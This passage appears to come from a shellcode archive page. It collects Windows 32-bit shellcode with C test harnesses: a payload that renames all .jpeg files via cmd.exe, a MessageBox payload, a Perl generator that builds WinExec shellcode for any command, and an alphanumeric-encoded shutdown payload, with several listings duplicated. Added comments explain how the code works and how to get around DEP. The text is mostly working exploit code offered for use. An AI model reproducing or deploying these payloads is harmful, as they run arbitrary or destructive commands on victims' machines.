    "\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"   /* push ebx; mov ebx,0x7599e739; call ebx; xor eax,eax */
    "\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"   /* push eax; mov ebx,0x75962a6f; call ebx; call -0x1b */
    "\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"   /* "cmd.exe" */
    "\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"   /* " REN *.jpe" */
    "\x67\x20\x2a\x2e\x76\x69\x72\x00";          /* "g *.vir" + NUL */
    
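    int main(int argc, char **argv)
    {
        (void)argc;
        (void)argv;
    
        /*
         * Report before jumping into the shellcode. Its final call
         * (push 0; call 0x75962a6f) looks like ExitProcess(0): if it is, control
         * never comes back here, so the original printf -- placed after the call
         * and without a newline -- never produced any output. fflush() makes sure
         * the text is out before the process goes away.
         */
        printf("Renaming all .jpeg files to .vir files");
        fflush(stdout);
    
        /*
         * Jumps into the global code[] data array. With DEP enabled for this
         * process that faults; copy the bytes to an executable mapping first if
         * so. The addresses inside code[] are specific to the author's
         * Windows 7 SP1 kernel32 and will not hold elsewhere.
         */
        ((void (*)(void))code)();
        return 0;
    }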
     

win32/ 7 sp1 MessageBox

# Exploit Title: win32/ 7 sp1 MessageBox
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Discovered by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/  Rats Crew    \/  TheCod3r\/ 
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
    
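    int main(int argc, char **argv)
    {
        (void)argc;
        (void)argv;
    
        /*
         * Report before jumping into the shellcode. Its final call
         * (push eax; call 0x75962a6f) looks like ExitProcess: if it is, control
         * never comes back here, so the original printf -- placed after the call
         * and without a newline -- never produced any output. fflush() makes sure
         * the text is out before the process goes away.
         */
        printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
        fflush(stdout);
    
        /*
         * Jumps into the global code[] data array. With DEP enabled for this
         * process that faults; copy the bytes to an executable mapping first if
         * so. The addresses inside code[] are specific to the author's
         * Windows 7 SP1 kernel32 and will not hold elsewhere.
         */
        ((void (*)(void))code)();
        return 0;
    }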
    
    

win32/ 7 sp1 MessageBox

# Exploit Title: win32/ 7 sp1 MessageBox
    # Date: July, 23 2011
    # Author: Theuzuki.'
    # Vendor or Software Link: -
    # Version: -
    # Category:: shellcodes
    # Google dork: -
    # Tested on: Windows 7 sp 1
    # Demo site: -
    
    ==================================================
    Discovered by:
    
    ___________.__            ____ ___              __  .__
    \__    ___/|  |__  ____ |    |  \__________ __|  | _|__|
      |    |  |  |  \_/ __ \|    |  /\___  /  |  \  |/ /  |
      |    |  |  Y  \  ___/|    |  /  /    /|  |  /    <|  |
      |____|  |___|  /\___  >______/  /_____ \____/|__|_ \__|
                    \/    \/  Rats Crew    \/  TheCod3r\/ 
    
    Mail: Uzuki@live.de
    Website: www.thecoder.co.tv
    Nicknames: TheUzuki.' / TheCod3r
    Greeting: TheRats Crew
    ==================================================
    
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    
    char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x2a\x59\xbb\x04\x28\x96\x75\x51\xff\xd3\xeb\x2f\x59\x51\x50\xbb\xd7\x17\x96\x75\xff\xd3\xeb\x34\x59\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\x6f\x2a\x96\x75\xff\xd0\xe8\xd1\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\xe8\xcc\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\xe8\xc7\xff\xff\xff\x54\x65\x73\x65\x64\x20\x66\x6f\x72\x20\x48\x61\x63\x6b\x69\x6e\x67\x20\x77\x69\x6e\x37\x20\x2d\x20\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00";
    
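    int main(int argc, char **argv)
    {
        (void)argc;
        (void)argv;
    
        /*
         * Report before jumping into the shellcode. Its final call
         * (push eax; call 0x75962a6f) looks like ExitProcess: if it is, control
         * never comes back here, so the original printf -- placed after the call
         * and without a newline -- never produced any output. fflush() makes sure
         * the text is out before the process goes away.
         */
        printf("Printing MsgBox with Tesed for Hacking win7 - MessageBox");
        fflush(stdout);
    
        /*
         * Jumps into the global code[] data array. With DEP enabled for this
         * process that faults; copy the bytes to an executable mapping first if
         * so. The addresses inside code[] are specific to the author's
         * Windows 7 SP1 kernel32 and will not hold elsewhere.
         */
        ((void (*)(void))code)();
        return 0;
    }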
    
    

Command Execution exploit/shellcode


#!/usr/bin/perl

system("cls");

# Prints the author's banner. The q'' literal is emitted verbatim, blank lines
# included, so nothing inside it may be touched.
sub logo(){

print q'

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

1 ______ 0

0 .-" "-. 1

1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0

0 Algerian HaCker | | > Site : 1337day.com | 1

1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0

0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1

1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0

0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1

1 _ ) \_______\__|IIIIII|__/_______________________ 0

0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1

1 )_/ \ / 0

0 (@ `--------` © 2011, Inj3ct0r Team 1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

';

}

logo();

###

# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com

# Twitter page : twitter.com/kedans

# platform : win32

# Impact : Command Execution / Shellcode maker

# Tested on : Windows XP sp3 Fr

###

# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends

###

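# Take the command to embed from the command line. It may be given as one
# quoted argument or as several words: the usage example itself passes
# "shutdown -s -t 18" unquoted (four arguments), which the original
# `@ARGV != 1` check rejected.
if (!@ARGV) {

print "\n [!] Usage: perl $0 [Command] \n\n";

die " [*] f.ex: perl $0 shutdown -s -t 18 \n";

}

my $CMD = join ' ', @ARGV;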

# Head of the generated C harness: includes, main() and the start of the
# shellcode array declaration (the bytes themselves come from $sh).
my $header = q'

#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){



unsigned char shellcode[]=

';

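# Stub + "cmd.exe /c " + the command, emitted as C string literals.
# The 34-byte stub is position independent: jmp/call/pop puts the address of
# the trailing command string in EBX, `mov [ebx+N], al` stores a NUL at the end
# of it, (0, string) is pushed and the absolute address 0x7c8623ad is called,
# then 0 is pushed and 0x7c81cafa is called. Both addresses are hardcoded for
# the tested XP SP3 build (presumably kernel32 WinExec / ExitProcess) and are
# wrong on any other build.
# The original hardcoded N as 0x29, which is only right for a 30-character
# command: anything shorter made the stub write the NUL past the end of the
# array, anything longer was cut off. N is now the real string length (the
# position of the array's own terminating NUL); it is a signed 8-bit
# displacement, so "cmd.exe /c <cmd>" as a whole is capped at 127 bytes.
my $nul_off = length("cmd.exe /c " . $CMD);

die " [!] Command too long: 'cmd.exe /c ' + command must be at most 127 bytes (got $nul_off)\n"
    if $nul_off > 127;

# Backslashes and double quotes would otherwise break the generated C literal.
(my $c_cmd = $CMD) =~ s/(["\\])/\\$1/g;

my $sh = "\n\n"
    . '"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43' . sprintf('\x%02x', $nul_off) . '\x53\xbb\xad\x23\x86\x7c".' . "\n\n"
    . '"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".' . "\n\n"
    . '"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20' . $c_cmd . '"';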

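# Tail of the generated C harness. strlen() returns size_t, so the size line
# uses %zu (the original emitted %d, which is undefined behaviour for a size_t
# argument); the cast avoids the char-signedness warning on the unsigned char
# array. The final call jumps into a stack array and only works with DEP
# disabled for the process.
my $end = q'



printf("Size = %zu bytes\n", strlen((const char *)shellcode));



((void (*)())shellcode)();



return 0;

}

';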



print $header.$sh.$end;


Command Execution exploit/shellcode


#!/usr/bin/perl

system("cls");

# Prints the author's banner. The q'' literal is emitted verbatim, blank lines
# included, so nothing inside it may be touched.
sub logo(){

print q'

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

1 ______ 0

0 .-" "-. 1

1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0

0 Algerian HaCker | | > Site : 1337day.com | 1

1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0

0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1

1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0

0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1

1 _ ) \_______\__|IIIIII|__/_______________________ 0

0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1

1 )_/ \ / 0

0 (@ `--------` © 2011, Inj3ct0r Team 1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

';

}

logo();

###

# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com

# Twitter page : twitter.com/kedans

# platform : win32

# Impact : Command Execution / Shellcode maker

# Tested on : Windows XP sp3 Fr

###

# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends

###

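# Take the command to embed from the command line. It may be given as one
# quoted argument or as several words: the usage example itself passes
# "shutdown -s -t 18" unquoted (four arguments), which the original
# `@ARGV != 1` check rejected.
if (!@ARGV) {

print "\n [!] Usage: perl $0 [Command] \n\n";

die " [*] f.ex: perl $0 shutdown -s -t 18 \n";

}

my $CMD = join ' ', @ARGV;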

# Head of the generated C harness: includes, main() and the start of the
# shellcode array declaration (the bytes themselves come from $sh).
my $header = q'

#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){



unsigned char shellcode[]=

';

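# Stub + "cmd.exe /c " + the command, emitted as C string literals.
# The 34-byte stub is position independent: jmp/call/pop puts the address of
# the trailing command string in EBX, `mov [ebx+N], al` stores a NUL at the end
# of it, (0, string) is pushed and the absolute address 0x7c8623ad is called,
# then 0 is pushed and 0x7c81cafa is called. Both addresses are hardcoded for
# the tested XP SP3 build (presumably kernel32 WinExec / ExitProcess) and are
# wrong on any other build.
# The original hardcoded N as 0x29, which is only right for a 30-character
# command: anything shorter made the stub write the NUL past the end of the
# array, anything longer was cut off. N is now the real string length (the
# position of the array's own terminating NUL); it is a signed 8-bit
# displacement, so "cmd.exe /c <cmd>" as a whole is capped at 127 bytes.
my $nul_off = length("cmd.exe /c " . $CMD);

die " [!] Command too long: 'cmd.exe /c ' + command must be at most 127 bytes (got $nul_off)\n"
    if $nul_off > 127;

# Backslashes and double quotes would otherwise break the generated C literal.
(my $c_cmd = $CMD) =~ s/(["\\])/\\$1/g;

my $sh = "\n\n"
    . '"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43' . sprintf('\x%02x', $nul_off) . '\x53\xbb\xad\x23\x86\x7c".' . "\n\n"
    . '"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".' . "\n\n"
    . '"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20' . $c_cmd . '"';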

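# Tail of the generated C harness. strlen() returns size_t, so the size line
# uses %zu (the original emitted %d, which is undefined behaviour for a size_t
# argument); the cast avoids the char-signedness warning on the unsigned char
# array. The final call jumps into a stack array and only works with DEP
# disabled for the process.
my $end = q'



printf("Size = %zu bytes\n", strlen((const char *)shellcode));



((void (*)())shellcode)();



return 0;

}

';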



print $header.$sh.$end;


Alphanumeric Shutdown 18s


/*



# Title : win32/xp sp3 Alphanumeric Shutdown 18s - Shellcode - 534 Bytes



# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com



# Impact : Shutdown at 18 s [~ CMD : shutdown -s -t 18]



# Tested on : Windows XP sp3 Fr



*/





#include <stdio.h>





/*
 * GetPC stub followed by the alphanumeric (encoded) payload; 534 bytes per the
 * header. The four instructions below leave the address of the FCMOVNB
 * instruction in ESI: FSTENV writes the 28-byte FPU environment at [EBX-0xC]
 * (EBX == ESP), which places the saved FPU instruction pointer (environment
 * offset 0xC) exactly at [ESP], and POP ESI reads it. The text that follows
 * starts with "VY" (push esi / pop ecx) and the "...jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI..."
 * prologue, which looks like an x86/alpha_mixed-style decoder keyed on ESI;
 * the decoded code is what runs "shutdown -s -t 18" according to the header
 * (not verifiable from these bytes alone).
 */
char shell[]=

"\x89\xE3" // MOV EBX,ESP -- point EBX at the stack so FSTENV can target it

"\xDB\xC2" // FCMOVNB ST,ST(2) -- any FPU instruction: its address is what FSTENV records

"\xD9\x73\xF4" // FSTENV (28-BYTE) PTR DS:[EBX-C] -- saved FPU instruction pointer lands at [ESP]

"\x5E" // POP ESI -- ESI = address of the FCMOVNB above, the base the decoder works from

// Start Alphanumeric Payload (encoded; printable ASCII only)

"VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"

"THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"

"QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"

"CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"

"NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA";

// End Payload



// End Payload

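int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    /*
     * The original overwrote main's own return address through
     * `(int *)&ret + 2` and stored `(int) shell` into it. That depends on one
     * particular frame layout (no stack protector, no frame-pointer omission,
     * no alignment padding), truncates the pointer on 64-bit builds and is
     * undefined behaviour everywhere. Call the buffer directly instead, as the
     * sibling listings on this page do.
     *
     * shell[] lives in a data section: with DEP enabled for the process the
     * first instruction faults. Copy the bytes into memory mapped
     * PAGE_EXECUTE_READWRITE (VirtualAlloc) and call that if so.
     */
    ((void (*)(void))shell)();
    return 0;
}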


Alphanumeric Shutdown 18s


/*



# Title : win32/xp sp3 Alphanumeric Shutdown 18s - Shellcode - 534 Bytes



# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com



# Impact : Shutdown at 18 s [~ CMD : shutdown -s -t 18]



# Tested on : Windows XP sp3 Fr



*/





#include <stdio.h>





/*
 * GetPC stub followed by the alphanumeric (encoded) payload; 534 bytes per the
 * header. The four instructions below leave the address of the FCMOVNB
 * instruction in ESI: FSTENV writes the 28-byte FPU environment at [EBX-0xC]
 * (EBX == ESP), which places the saved FPU instruction pointer (environment
 * offset 0xC) exactly at [ESP], and POP ESI reads it. The text that follows
 * starts with "VY" (push esi / pop ecx) and the "...jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI..."
 * prologue, which looks like an x86/alpha_mixed-style decoder keyed on ESI;
 * the decoded code is what runs "shutdown -s -t 18" according to the header
 * (not verifiable from these bytes alone).
 */
char shell[]=

"\x89\xE3" // MOV EBX,ESP -- point EBX at the stack so FSTENV can target it

"\xDB\xC2" // FCMOVNB ST,ST(2) -- any FPU instruction: its address is what FSTENV records

"\xD9\x73\xF4" // FSTENV (28-BYTE) PTR DS:[EBX-C] -- saved FPU instruction pointer lands at [ESP]

"\x5E" // POP ESI -- ESI = address of the FCMOVNB above, the base the decoder works from

// Start Alphanumeric Payload (encoded; printable ASCII only)

"VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOKEoDFPNEsFQIYLqEeKjKcIICDDdIdQJNcKrGtFQQJDKGsQJF"

"THdMkIONBPaG3GPGBB2HMKuDCC0OYNnEaMDH9O3LyQOHoJWCzDmP8KGIkLXGnGFIlDlMOOdEnFNQsHgEBJ0PZFHQwKaMKF5OwLCD4D"

"QP5DtJPE7OuP5JvJCMeBmCcDsQQKTQJBDKIBSEDOlQbIKK5MMBwEoJYN4KlHtMYJFDtKuBRKiBXOzBlJuBUIBLIKbPeMqKQEpFxNRP1"

"CjHFGGOTKLNmIpDLKLG2D6O6L2DoKLOpGfNNJqLzQ3GKKdPlMrQoL3NHHnFDOjIyPJNkOSIzFSD4EVCPKaE1FPFKOLQdNPPQHyD6KzQI"

"NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA";

// End Payload



// End Payload

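int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    /*
     * The original overwrote main's own return address through
     * `(int *)&ret + 2` and stored `(int) shell` into it. That depends on one
     * particular frame layout (no stack protector, no frame-pointer omission,
     * no alignment padding), truncates the pointer on 64-bit builds and is
     * undefined behaviour everywhere. Call the buffer directly instead, as the
     * sibling listings on this page do.
     *
     * shell[] lives in a data section: with DEP enabled for the process the
     * first instruction faults. Copy the bytes into memory mapped
     * PAGE_EXECUTE_READWRITE (VirtualAlloc) and call that if so.
     */
    ((void (*)(void))shell)();
    return 0;
}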